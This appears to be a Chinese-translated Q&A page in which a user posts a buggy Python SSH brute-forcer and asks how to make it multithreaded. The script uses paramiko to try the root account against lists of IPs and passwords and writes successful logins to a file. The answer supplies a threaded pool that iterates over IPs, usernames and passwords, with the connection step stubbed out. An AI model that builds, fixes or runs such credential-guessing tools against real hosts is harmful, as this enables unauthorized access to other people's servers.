多线程我简单的SSH Brute forcer

时间:2014-03-12 16:25:06

标签: python multithreading ssh brute-force

我编写了一个简单的SSH Bruteforcer,我正试图让它多线程,因为它现在运行得很慢。正如您在最后几行中所看到的那样,我尝试过它,但不完全理解线程。我已经阅读了一些例子,但我并不完全理解它,所以我觉得加入我的程序会让我更好地理解它。

代码:

try:
    import paramiko
except ImportError:
    print("Paramiko module not installed, exiting.")
from multiprocessing.dummy import Pool, Process, JoinableQueue as Queue
import os
from datetime import datetime
startTime = datetime.now()


UserName2 = 'root'
pass_file = 'pass.txt'
ip_file = 'ip.txt'
port = 22
Found = 0
IPLines = 0
PasswordLines = 0

with open('pass.txt') as txt1:
    for line in txt1:
        if line.strip():
            PasswordLines += 1

with open('ip.txt') as txt2:
    for line2 in txt2:
        if line2.strip():
            IPLines += 1


current_attempts = 0
max_attempts = PasswordLines * IPLines




def print_results(found):
    while True:
        ip, password = found.get()
        print("Found: %r %r" % (ip, password))
        found.task_done()


def init(found_):
    global found
    found = found_


def generate_passwords():
    #return (line.strip() for line in open(pass_file))
    global ip
    global pwd
    global txt4
    txt3 = open(pass_file, "r")
    txt4 = open(ip_file, "r")
    for line3 in txt3.readlines():
        pwd = line3.strip()
    for line4 in txt4.readlines():
        ip = line4.strip()


def check(ip_password):
    global current_attempts
    ip, password = ip_password
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(ip, port, username=UserName2, password=pwd)
    except paramiko.AuthenticationException, e:
        print e
        print '[-] %s:%s fail!' % (UserName2, pwd)
        current_attempts += 1
    except Exception, e:
        print e
    else:
        print '[!] %s:%s is CORRECT for IP %s!' % (UserName2, pwd, ip)
        username, password, ipaddress = UserName2, pwd, ip
        found.put((username,password,ipaddress))
        seconds_taken = datetime.now() - startTime
        print 'brute forcing took %s seconds' % seconds_taken
        ssh.close()
        print 'Found login in %s attempts' % current_attempts
        if os.path.isfile("correct.txt"):
            c = open("correct.txt", "a")
            c.write('\n' + ip + ':' + UserName2 + ':' + pwd)
        elif os.path.isfile("correct.txt"):
            c = open('correct.txt', "w")
            c.write(ip + ':' + UserName2 + ':' + pwd)


def main():
    found = Queue()
    t = Process(target=check, args=[found])
    t.daemon = True  # do not survive the parent
    t.start()
    pool = Pool(processes=20, initializer=init, initargs=[found])
    args = ((ip, password) for password in generate_passwords() for ip in txt4)
    for _ in pool.imap_unordered(check, args):
        pass
    pool.close()  # no more tasks
    pool.join()   # wait for all tasks in the pool to complete
    found.join()  # wait until all results are printed

if __name__ == "__main__":
    main()

错误:

Exception in thread Thread-1:
Traceback (most recent call last):
  File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
    self.run()
  File "C:\Python27\lib\threading.py", line 763, in run
    self.__target(*self.__args, **self.__kwargs)
  File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 65, in check
    ip, password = ip_password
TypeError: iteration over non-sequence


Traceback (most recent call last):
  File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 107, in <module>
    main()
  File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 99, in main
    args = ((ip, password) for password in generate_passwords() for ip in txt4)
TypeError: 'NoneType' object is not iterable

1 个答案:

答案 0 :(得分:1)

这个问题令人尴尬地平行。您可以同时运行针对不同ips和密码的ssh连接尝试:

#!/usr/bin/env python
# remove .dummy to use processes instead of threads
from multiprocessing.dummy import Pool

def check(params):
    ip, username, password = params

    # emulate ssh login attempt #XXX put your ssh connect code here
    import random
    successful = random.random() < .0001
    return successful, params

def main():
    creds = {}
    ips = ["168.1.2.%d" % i for i in range(256)] #XXX dummy ip list, use yours
    usernames = ["nobody", "root"] #XXX dummy user list, use yours
    def generate_args():
        for ip in ips:
            for username in usernames:
                for password in generate_passwords():
                    if (ip, username) in creds:
                        break
                    yield ip, username, password
    pool = Pool(processes=20)
    for success, params in pool.imap_unordered(check, generate_args()):
        if not success:
            continue
        print("Found: %r" % (params,))
        ip, username, password = params
        creds[ip, username] = password
    pool.close() # no more tasks
    pool.join()  # wait for all tasks in the pool to complete

if __name__=="__main__":
    main()

其中ips是一个列表,如果您要尝试的所有ips和generate_passwords()是一次生成一个密码的生成器,这是一个示例:

def generate_passwords(pass_file):
    return (line.strip() for line in open(pass_file))

关于错误

ValueError: too many values to unpack

您的代码有found.put((username,password,ipaddress))(包含3个值的元组),但print_results()函数需要ip, password = found.get()(2个值)。错误“太多要解压的值”是因为3大于2

'NoneType' object is not iterable

attempt()函数不返回任何内容(None),但是您将其放在必须生成密码的generate_passwords()的位置(请参阅上面的示例实现)。

相关问题
最新问题